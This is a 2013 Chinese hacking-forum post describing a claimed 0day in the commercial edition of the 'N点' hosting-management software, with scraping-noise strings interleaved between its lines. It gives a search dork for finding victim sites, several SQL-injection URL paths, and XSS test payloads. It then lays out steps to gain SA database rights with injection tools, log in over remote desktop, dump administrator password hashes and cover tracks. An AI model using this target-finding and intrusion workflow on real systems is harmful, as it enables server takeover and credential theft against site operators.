中国网络渗透测试联盟
标题:
N点商业版漏洞通杀0day以及利用方法
[打印本页]
作者:
admin
时间:
2013-3-3 08:06
标题:
N点商业版漏洞通杀0day以及利用方法
不得不说N点实在是一个破东西
& ^9 C' G7 f/ o! `! s ^
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
$ m# ?1 h* T9 u* z# V$ F
好吧 抱怨一下就行了 接下来关键的时候到了
& m; U: C" O8 [, g+ @* _7 j
首先百度搜索关键字:inurl: (mmdatabase.asp)
5 N6 M: J. k. v% J$ P9 }1 n9 w; ^
我随便列举一个:
www.xxxx.com
5 n8 `6 D b( u: F7 A( S) \3 @
修改链接:
http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
: W. S* q1 \% z) e! J( X
扔入NBSI 或者啊D等各种傻逼工具后
) ~8 U) |1 E. p$ j$ F$ `2 }6 Y
你们会看到是SA权限
/ j, u T) w' f' I+ K
果断3389 上去 hash得到administrator密码
7 p! q' @% n6 k
擦屁股走人~
7 E; c: w: D* q: N) H5 ^: y H
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
3 ?, i# Y' Z& \( h8 b5 C% b4 o
# ?6 H ?4 F) W1 e+ e
再附上其他几个漏洞页面
( n# b# E& B) a# B# C* g* m4 j- }
SQL:
, X0 r1 e( @( m
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
% Y9 O2 G* y3 F. c' x0 d" P
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
- ~: c+ s: b( t$ n E L
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
* c$ X8 v( K# {) H( d6 O0 r0 T
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
( W4 _. ^+ x+ i; y
XSS证明:
; l$ [* q/ o8 P! G( H- |* w( v* K
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
7 M7 \1 Y9 R7 R F0 ?6 B
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
# V* K$ S) F" D
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn
<script>alert(42873)</script>
% Q& A4 o8 o9 s q$ h) b) m. ^- j
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
+ P1 L% N) ]& y; Y" A
还是星外吧 你们懂的
9 {; P% c) O1 ?: V
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
& c2 E9 z4 f9 M6 e* `
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
0 U3 u; y; V0 Z' p: J3 s- q
——-
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2